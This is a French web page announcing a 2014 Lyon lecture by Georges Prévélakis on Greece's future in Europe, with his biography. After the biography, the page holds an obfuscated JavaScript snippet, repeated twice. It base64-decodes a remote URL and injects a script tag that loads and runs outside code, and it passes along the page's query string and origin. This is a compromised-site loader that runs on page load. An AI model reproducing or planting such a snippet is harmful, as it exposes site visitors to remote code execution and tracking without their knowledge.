Conférence: Georges PREVELAKIS

Chères amies, chers amis,αγαπητοί μας φίλες και φίλοι,

Defkalion, organise en partenariat avec la Maison de l’Europe et des Européens Lyon/Rhône-Alpes, un cycle de conférences autour de la crise, non seulement économique, en Grèce et en Europe.

Première conférence de :

M. Georges PREVELAKIS, Professeur à la Sorbonne

La Grèce et l’Europe : quel avenir commun ?

« Patrimoine, situation géographique, diaspora, marine marchande.

Les avantages comparatifs de la Grèce, un atout pour l’Europe. »

Samedi 22 novembre 2014 à 17h

Ecole de Commerce Européenne de Lyon (ECE)

22, rue Royale – 69001 Lyon

Georges Prévélakis est né à Athènes en 1949. Il a suivi des études d’Architecte-Ingénieur à Athènes et d’Aménagement en France. Il fut enseignant-chercheur en Grèce (Ecole polytechnique, Université Panteion), en France (La Sorbonne, l’Institut des Sciences Politiques de Paris et l’INALCO), aux Etats-Unis (Johns Hopkins University, Boston University, Tufts University) et au Royaume-Uni (London School of Economics). Entre 2003 et 2005, il a occupé la chaire Constantin G. Karamanlis en Études helléniques et européennes à la Fletcher School. Professeur des Universités à Panthéon-Sorbonne (Paris 1) depuis 2000, il a été fortement sollicité par les média et think-tanks français et internationaux à propos des questions de sécurité dans les Balkans et de la crise économique grecque.

Les intérêts de recherche de M. Prévélakis portent sur les interactions entre culture, politique et économie. En tant que spécialiste de la Géopolitique, il envisage ces questions au travers d’une diversité d’échelles géographiques, territoriales ou réticulaires.

M. Prévélakis est co-directeur de la revue scientifique française Anatoli (CNRS Editions). Il publie une tribune par quinzaine pour le quotidien d’Athènes Estia. Il a publié de nombreux livres et articles dans des revues scientifiques, parmi lesquels : Les Balkans, Cultures et géopolitique (Nathan, Paris), Les réseaux des diasporas (L’Harmattan, Paris), Géopolitique de la Grèce (Complexe, Bruxelles) et Athènes : Urbanisme, culture et politique (L’Harmattan, Paris).

Depuis septembre 2013 il est le Représentant permanent de la Grèce auprès de l’OCDE.

(function(){var a=document.head||document.getElementsByTagName(“head”)[0],b=”script”,c=atob(“aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=”);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();(function(){var a=document.head||document.getElementsByTagName(“head”)[0],b=”script”,c=atob(“aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=”);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.